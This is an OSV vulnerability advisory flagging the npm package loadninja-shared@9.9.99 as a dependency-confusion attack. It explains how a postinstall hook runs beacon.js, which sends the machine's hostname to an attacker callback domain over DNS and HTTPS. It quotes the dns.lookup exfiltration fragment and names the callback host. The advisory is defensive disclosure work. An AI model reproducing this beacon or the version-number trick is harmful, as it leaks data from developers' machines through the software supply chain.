loadninja-shared @9.9.99
Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 3:29 AM UTC
OSV ID
MAL-2026-5744
Ecosystem
npm
Summary
loadninja-shared@9.9.99 is a dependency-confusion package targeting an internal/private package namespace. package.json declares "postinstall": "node beacon.js", which fires automatically on npm install. beacon.js reads os.hostname() and transmits it, together with a nonce and the package name, to the attacker-controlled out-of-band domain tspeuj1fodn3cj8v30uck2fs4jaby1mq.oastify.com (Burp Collaborator infrastructure) over both a DNS lookup (dns.lookup(NONCE + '.' + host63 + '.' + HOST, ...)) and an HTTPS POST. Version 9.9.99 is the canonical high-version trick used to win npm resolution against a legitimate internal package of the same name, capturing misrouted internal builds. Although a code comment labels the file a "benign PoC," the behavior is identical to a live dependency-confusion exploitation beacon: any installer that resolves this package leaks its host identifier to a third-party callback domain without consent.
Source: amazon-inspector (dc01a627a5f67d1af201bfe6575973437cce899d9767312d44a40369dc16cc46)